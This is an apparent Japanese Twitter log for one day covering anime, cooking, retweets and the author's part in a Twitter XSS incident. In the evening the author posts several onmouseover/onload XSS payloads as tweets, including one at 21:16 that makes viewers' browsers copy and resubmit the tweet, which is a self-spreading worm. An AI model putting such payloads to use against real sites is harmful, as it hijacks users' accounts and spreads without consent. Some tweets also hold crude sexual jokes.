Tue, Sep 21

  • 03:55  生徒会役員共]ダメだー!!
  • 03:57  生徒会役員共]よく受かったな…。(受かるの知ってたけど)
  • 03:59  生徒会役員共]「来週最終回」←なん…だと…
  • 03:59  RT @colic_ppp: そういえば、僕が通っていた小学校には2mくらいで登れる大きな岩がちょっとしたモニュメントで設置されていて、よく登って遊んでたんだけど、さすがにその上でネタとは言えチンチンシュッシュッをやったやつには驚きましたね。ダッシュで捕まえにきた先生に引 ...
  • 04:00  私に思春期は有りませんでした!
  • 04:09  ファフナーのCMにビビった。乙姫さんが妊娠!?とか、真壁司令年取ったなーとか。まー、あのアニメは「生老病死」のよーな事を表現してた(よーなきがするが忘れた)ので、そんなに驚くトコでも無い気がするけど。
  • 04:11  生徒会役員共で一番好みなキャラは津田さんの妹さんです。(私はロリコンではありません)
  • 04:49  [ファフナー]そういえば、結局真壁司令と遠見先生は結婚しちゃったんだろうか…。
  • 05:03  「ひらがな四文字+!」のパターンは形態素解析器泣かせの流行だと思う。
  • 05:09  東京には旅行に行きたくないし、ましてや住みたくもない。だって日本でテロが起きるなら東京だけだもん。あんな危険な場所、怖くて行けない…。(ガクブル)
  • 06:08  え、りむったー停止してたの…?フォロー数減ってるのに通知来ないと思ったら…。今までありがとうございました!りむったー先生の次回作にご期待ください!
  • 06:09  RT @tsuda: 昨日実家に帰った際久々に会う叔父さん(70歳超)が「iPadってのが凄いんだよな。あれに新聞も書籍もテレビも全部入っちゃうんだってよ」と正しく話しているのを聞いてiPadキャズム超えてるというかアップルのメディア戦略が上手く行ってるんだなぁとしみじみ思った。
  • 06:13  最近BLEACHが面白い!あんなに素晴らしいギャグマンガなのに、今までずっとストーリー漫画だと誤解してました!ごめんなさい!
  • 06:32  うちの会社の人は誰一人Watirのすばらしさを理解してくれない…。orz
  • 07:39  今日はお休み取ってるのでお休みです。
  • 07:44  RT @anekos: Vimperator は誰でも簡単に始められるブラウザです。みなさん奮って御導入ください! #vimperator
  • 07:47  RT @kenji0302: 特攻野郎Aチームの上映って今週が最後?!いかねば。
  • 07:50  眠さに負ける自分が許せないので、高額医療費に苦しむアメリカ人の番組を流しながら仮眠を取ることにする。せいぜい悪夢でもみるがいい。
  • 08:12  案の定痛い過去の夢を見せられた。痛い痛い。
  • 08:13  RT @kakuretajigen: 朝から笑わせないで RT @SeiYasHot: 宮城県の高校生、オナニーのしすぎで死亡 http://bit.ly/aacpgA - 昨日ニュースだけど、こんなのあったのね。みなさん気をつけてねw
  • 11:42  RT @alpaka: 【速報】辞表出した
  • 11:42  @alpaka お、おつかれでしたー。
  • 13:31  上条さんの説教は武力行使を前提としたネゴシエーションとしてはとても正しい。「説教で相手の信条を揺さぶる」→「上条さん殴る」→「上条さん自身は恨まれない&たまに円満解決」
  • 13:36  「日本の学生は遊んでばかり」という批判があるけど、社会人になっても1ヶ月レベルの休暇がある国には言われたくない!と思うんだけど、反論出来ない。(だって心の底から羨ましいんだもん)
  • 13:40  ご飯吹いたわ RT @ryannzou 皆さん!キャプテン右翼Tシャツはここで買えます! RT @zigzagroove: @ryannzou 戯れにキャプテン右翼Tシャツ作ってみました http://clubt.jp/product/134051.html
  • 13:41  RT @iskw226: ついにジャストシステムiPhone向けアプリ「ATOK Pad」を発表。ちなみにメモアプリになります。キャプチャ画像はこちら→ http://plixi.com/p/46288347
  • 13:43  誰か物好きが趣味で作ったのを製品化したっぽいな。 I'm Viewing: ついにジャストシステムiPhone向けアプリ「ATOK Pad」を発表。ちなみにメモアプリになります。キャプチャ画像はこちら→ | Plixi http://bit.ly/aPHcN5
  • 13:56  Twitterもブランチ切れたらいいのに…。
  • 14:12  左の人の事務所が近くにあるので困っちゃう! RT @ryannzou .@Sunitha ご飯吹いた記念にキャプテン右翼Tシャツ買っちゃいましょう!(笑)
  • 14:13  RT @unarist: 「俺プログラミングできるんだぜ!」「ふーん」 「俺ボカロ調教上手いんだぜ!」「あっそ」  「俺ウェブ検索得意なんだぜ!」「おおおっ」 ←これが現実
  • 14:13  RT @hitomi787: 「東京の夜景は残業でできている。」
  • 14:14  TDD=テストファーストじゃないんだね、ちぃ、おぼえた。
  • 14:18  「きのう」という言葉を脳から消そう。ぜんぶ「さくじつ」と読もう。だって「機能」と被りすぎる。
  • 16:18  バルクホルン可愛い。 I'm Viewing: 【ストライクウィッチーズ】最終回の前にシャーリーとバルクホルンの画像を! - ニコニコ静画(W) http://bit.ly/ctJiAr
  • 16:35  バルクホルン可愛いwww I'm Viewing: ボンバルクホルンニコニコ動画(9) http://bit.ly/bVCUHR
  • 16:43  眼福(げっぷ) I'm Viewing: 675477 (961×1398) http://bit.ly/bWWa48
  • 16:52  バルクホルンが可愛すぎて三次元にいるのが辛い…。
  • 17:13  RT @Yappo: 「ソーシャルゲームやってると、特定の曜日だけお金取られるんだって。何曜日と何曜日?」「火、金」
  • 18:21  こんなもんどうするんだ…。 I'm Viewing: WTANZ 09: Spidering Australia’s National Toilet Map with Watir http://bit.ly/cWhgny
  • 18:24  @RainbowTwtr なにこれ?  [in reply to RainbowTwtr]
  • 18:25  こんにちはこんにちは!!
  • 18:25  RT @RainbowTwtr: http://twitter.com/RainbowTwtr#@"style="background-color:purple;color:purple;position:absolute;top:0;left:0;width:100%; ...
  • 18:27  http://twitter.com/RainbowTwtr#@"style="background-color:white;color:black;position:absolute;top:0;left:0;width:100%;height:100%"/
  • 18:37  http://ex.co/@"onload="alert('こんばんは')" style="background-color:indigo;color:indigo;position:absolute;top:0;left:0;width:100%;height:100%"/
  • 18:38  http://ex.co/@"onblur="alert('こんばんは')" style="background-color:indigo;color:indigo;position:absolute;top:0;left:0;width:100%;height:100%"/
  • 18:41  http://ex.co/@"onfocusin="alert('hola')" style="color:indigo;position:absolute;top:0;left:0;width:100%;height:100%"/
  • 18:43  XSS飽きた。
  • 18:50  RT @bulkneets: 初出これ http://bit.ly/9yCw3p
  • 18:54  そういえば、XSSって、urlにスクリプトを混入させるのが特色なので、今起こっているような事例は、スクリプトインサーションなんじゃなかったっけ?
  • 18:59  RT @admtan: 【拡散】致命的なXSS脆弱性が広まってるのでWebからtwitterしないほうがいいですよ
  • 19:01  XSS騒動で面白がった口なので、リムーブされても文句は言えない。
  • 19:20  今回のXSSはmouseoverしなければ大丈夫なので、みんなショートカットキー覚えればいいと思うよ!
  • 19:22  流石に今webからpostするようなバカは私だけか。
  • 19:23  RT @itnews2: [ITmedia] iPhoneIMEとしてATOK提供「あきらめていない」 iPad対応、Android版も: iPhoneに外部IMEを組み込むことは許されていないため、ジャストシステムはメモアプリにATOKを搭載して発売... http: ...
  • 19:26  @flandeanemone 台風とかワクワクしちゃういけない子なの…。  [in reply to flandeanemone]
  • 19:28  ご飯とか作ろうと思います。
  • 19:37  @flandeanemone いけないわ!私には嫁と血の繋がっていない妹と兄嫁と毎朝起こしに来てくれる幼なじみと卑猥な儀式で召喚した僕と拾ってきた犬と空から降って来た人間じゃない女の子とイケナイ生徒会長と個人授業してくれる先生とツンデレの委員長と没落しちゃったお嬢様とがいるの!  [in reply to flandeanemone]
  • 19:44  RT @itmedia_news: 東芝が新しい冷蔵庫「VEGETA(べジータ)」発表。ついドラゴンボールを思い出してしまいます^海外担当 http://bit.ly/cu8kxm
  • 20:03  http://e.co/@" onmouseover="{何か}"で実行出来るなんて、普通考えないよなー。見つけたヤツはすごい。
  • 21:15  カレー作った。獅子唐入れすぎてちょっと苦くなった。味覇入れて調整した。
  • 21:16  http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
  • 21:17  まだダメだな。運営仕事しろ。
  • 21:28  カレー作ったのにご飯炊くの忘れてた…。
  • 22:14  明日のために月見団子買ってきました。
  • 22:15  ポテトチップスのフレンチビネガー味を買ってきた。懐かしいな、これ。
  • 22:20  どうも、そろそろほんとにブラウザからpostするのが危険になってきたな…。手口がどんどん巧妙になってきている…。さっきなんてLightBoxにされたぞ…。
  • 22:42  I'm Viewing: Twitter脆弱性突くコードが拡散 Webブラウザでのアクセス自粛呼び掛け - ITmedia News http://bit.ly/9VaIfz
  • 22:50  I'm Viewing: 郵便不正事件で検事が押収フロッピー内の証拠文書の更新日時を改ざん - スラッシュドット・ジャパン http://bit.ly/cAY8G5
  • 22:55  RT @femm: XSS対策したよって大本営発表 http://status.twitter.com/post/1161435117/xss-attack-identified-and-patched
  • 22:56  お、一応治ってるっぽい。でも、そこで更に脆弱性を探すのが紳士のマナー。
  • 23:00  @flandeanemone おやすみー。  [in reply to flandeanemone]
  • 23:03  レインボーじゃなくなってる…。orz くらえ、おまえにレインボー!! I'm Viewing: RainbowTwtr (RainbowTwtr) on Twitter http://bit.ly/b515MC
  • 23:05  エクストリームにも程がある! I'm Viewing: 今日もやられやく 『機動戦士ガンダム EXTREME VS』オリジナルガンダムの設定が厨二全開・・・そしてこのデザインセンス http://bit.ly/dgdZrw
  • 23:11  XSSはともかく、深夜〜早朝にいい仕事をしたアメリカの技術者を褒めてあげよう!
  • 23:28  一応個人情報漏れたらやばいトコのパスワード全部変えたよ!みんなもやったほうがいいと思うよ!
  • 23:32  RT @bookmaxim: この世に生を授け、育ててくれた親のことを考えれば、少しでも長生きさせてあげたいと思うのは子どもとしても当然なのですが、介護という課題は、そんな当然の人情すら吹き飛ばしてしまうほど過酷で、親子の絆すら断ち切ってしまう類のものなので(P040)h ...

Powered by twtr2src